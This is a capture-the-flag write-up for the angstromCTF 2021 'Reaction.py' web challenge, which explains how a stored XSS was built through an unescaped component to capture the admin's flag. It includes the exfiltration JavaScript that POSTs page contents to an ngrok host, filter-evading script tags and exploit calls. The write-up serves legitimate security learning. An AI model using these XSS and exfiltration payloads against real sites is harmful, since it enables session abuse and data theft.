Rating: 5.0

Reaction.py - angstromCTF 2021

  • Category: Web
  • Points: 150
  • Solves: 90
  • Solved by: SM_SC2, drw0if, Iregon, raff01


Jason's created the newest advancement in web development, Reaction.py! A server-side component-based web framework. He created a few demo components that you can find on his site. If you make a cool enough webpage, you can submit them to the contest and win prizes! Source Admin bot source


We have a "site generator" with which we can add predefined components as logged-in users.


When we create a component, a POST request is sent to /newcomp and the specified component is added to the / page through the add_component function.

If we press submit site to contest button, our page is sent to /contest that checks the Google Captcha and open the page inside a puppeteer instance through visit.js

@app.route("/contest", methods=["POST"])
def contest_submission(user):
    captcha_response = request.form.get("g-recaptcha-response")
    if not captcha_response:
        return ("Please complete the CAPTCHA", 400)
    secretkey = captcha.get("secretkey")
    if secretkey:
        r = requests.post(
            data={"secret": secretkey, "response": captcha_response},
        if not r["success"]:
            return ("Invalid CAPTCHA", 400)
            ["node", "visit.js", user["username"]],
            # stdout=subprocess.DEVNULL,
            # stderr=subprocess.DEVNULL,
        return PAGE_TEMPLATE.replace(
            """<p>The admin should have reviewed your submission. <a href="/">Back to homepage</a></p>""",

We can't inject malicious code via username because it accepts only letters, digits and _

The site use an in-memory storage. Our data are stored inside accounts[username] and the HTML components inside accounts[username]["bucket"].

There is a default "admin" user which has the flag.

accounts = {
    "admin": {
        "username": "admin",
        "pw": admin_password,
        "bucket": [f"<p>{escape(flag)}</p>"],
        "mutex": Lock(),

As we can see, there is a custom middleware that lets us impersonate whatever user we want. It only needs the secret cookie.

def mustlogin(route):
    def ret():
        if request.cookies.get("secret") == admin_password:
            fakeuser = request.args.get("fakeuser")
            if fakeuser:
                return route(user=accounts[fakeuser])
        if "username" not in session or session["username"] not in accounts:
            return redirect("/login", code=302)
        return route(user=accounts[session["username"]])

    return ret

The only interesting function is add_component. It adds our components to bucket (max 2). Through the name parameter we can choose one of the following components:


if name == "welcome":
        if len(bucket) > 0:
            return (ERR, "Welcomes can only go at the start")
            <form action="/newcomp" method="POST">
                <input type="text" name="name" placeholder="component name">
                <input type="text" name="cfg" placeholder="component config">
                <input type="submit" value="create component">
            <form action="/reset" method="POST">
                <p>warning: resetting components gets rid of this form for some reason</p>
                <input type="submit" value="reset components">
            <form action="/contest" method="POST">
                <div class="g-recaptcha" data-sitekey="{}"></div>
                <input type="submit" value="submit site to contest">
            <p>Welcome <strong>{}</strong>!</p>
                captcha.get("sitekey"), escape(cfg)


elif name == "char_count":
                    f"<strong>{len(cfg)}</strong> characters and <strong>{len(cfg.split())}</strong> words"


elif name == "text":


elif name == "freq":
        counts = Counter(cfg)
        (char, freq) = max(counts.items(), key=lambda x: x[1])
            "<p>All letters: {}<br>Most frequent: '{}'x{}</p>".format(
                "".join(counts), char, freq

In the first three components, our input (cfg) is escaped via flask escape. In the last one, cfg is not, but duplicated characters are eliminated because of Counter function.

Looking at visit.js code we have the cookie we need. Unfortunately, it can't be stolen through javascript (httpOnly: true), neither through CSRF attack (sameSite: "Strict", domain:


The site is vulnerable to XSS attack. We can't and we don't need to get the cookies. We just need that puppeteer, which has them, makes a request for us as admin and send the response to us. We used ngrok as HTTP bin.

    .then(response => response.text())
    .then(data =>{
        fetch('http://293fb56704d7.ngrok.io/', {
            method : 'post',
            body: data

Due to the limitations of the freq component, we must load our script as an external resource. So we served it through a PHP server (maybe it can be a simple js file).

We want to inject

<script src="https://293fb56704d7.ngrok.io"></script>

but we have to remove duplicates. So:

  1. uppercase script
  2. change https:// to //
  3. remove double quotes
<SCRIPT src=//293fb56704d7.ngrok.io></script>

We can't use double slash, so we HTML encode &#47; the second one.

Our URL is too long. After a bit of research, the solution is bit.ly which lets us create custom paths and its domain has available characters.

We must close the script tag in order to be executed, so we have to use the second component and comment out everything between the two tags. We used a single quote instead of comment :sweat_smile:

<SCRIPT src=/&#47;bit.ly\2Q5ZXW1>' [content to comment out] '</SCRIPT>


new_comp('freq', '<SCRIPT src=/&#47;bit.ly\\2Q5ZXW1>\'')
new_comp('freq', '\'</SCRIPT>')

Before doing this, we have to reset the page through a POST request to /reset. Run py ./exploit.py

Now, we have to:

  1. open the / page through the browser and log in
  2. open browser console and execute the following script to recreate the sending form and Google Captcha
document.body.innerHTML += '<form action="/contest" method="POST"><div class="g-recaptcha" data-sitekey="6LfbKpgaAAAAAJBO6sFtDLzXUHeZBZaKtNxQB-yr"></div><input type="submit" value="submit site to contest"></form>'

let myScript = document.createElement("script");
myScript.setAttribute("src", "https://www.google.com/recaptcha/api.js");
  1. press submit site to contest

And we have the flag to our HTTP bin



Original writeup (https://github.com/r00tstici/writeups/tree/master/angstromCTF_2021/reaction_py).